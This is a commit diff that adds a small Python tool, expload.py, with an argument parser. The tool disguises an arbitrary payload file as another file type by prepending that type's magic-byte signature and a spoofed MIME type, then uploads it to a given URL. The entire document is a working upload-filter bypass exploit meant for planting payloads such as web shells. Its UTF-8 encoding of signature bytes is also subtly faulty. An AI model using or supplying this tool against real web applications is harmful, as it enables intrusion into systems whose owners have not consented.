Add files via upload

expload.py

@@ -0,0 +1,32 @@
+import tempfile
+from pyfsig import constants
+import requests
+import mimetypes
+import lib.parse
+mimetypes.init()
+
+
+def grabsig(ext):
+    for sig in constants.SIGNATURES:
+        if sig["file_extension"] == ext:
+            return "".join([chr(h) for h in sig["hex"]]).encode("utf-8"), mimetypes.types_map[f".{ext}"]
+
+def fileupload():
+    ext=args.ext
+    name=args.name
+    filename=args.filename
+    with open(args.payload,"r") as payload:
+        content=payload.read().encode("utf-8")
+    with tempfile.NamedTemporaryFile() as tmp:
+        sig,mime=grabsig(ext)
+        tmp.write(sig)
+        tmp.write(b"\n")
+        tmp.write(content)
+        tmp.seek(0)
+        files = {name: (filename, tmp, mime)}
+        r = requests.post(args.url, files=files)    
+        print(r.text)      
+
+if __name__ == "__main__":
+    args=lib.parse.parser()
+    fileupload()

lib/parse.py

@@ -0,0 +1,11 @@
+import argparse
+def parser():
+	parser = argparse.ArgumentParser(description="expload args")
+	parser.add_argument("-u", "--url",required=True,help="url to upload to")
+	parser.add_argument("-p", "--payload",required=True,help="path to file to upload")
+	parser.add_argument("-e", "--ext",required=True,help="extension to spoof")
+	parser.add_argument("-n", "--name",required=True,help="field name for file upload")
+	parser.add_argument("-f", "--filename",required=True,help="file name to upload with")
+
+	args = parser.parse_args()
+	return args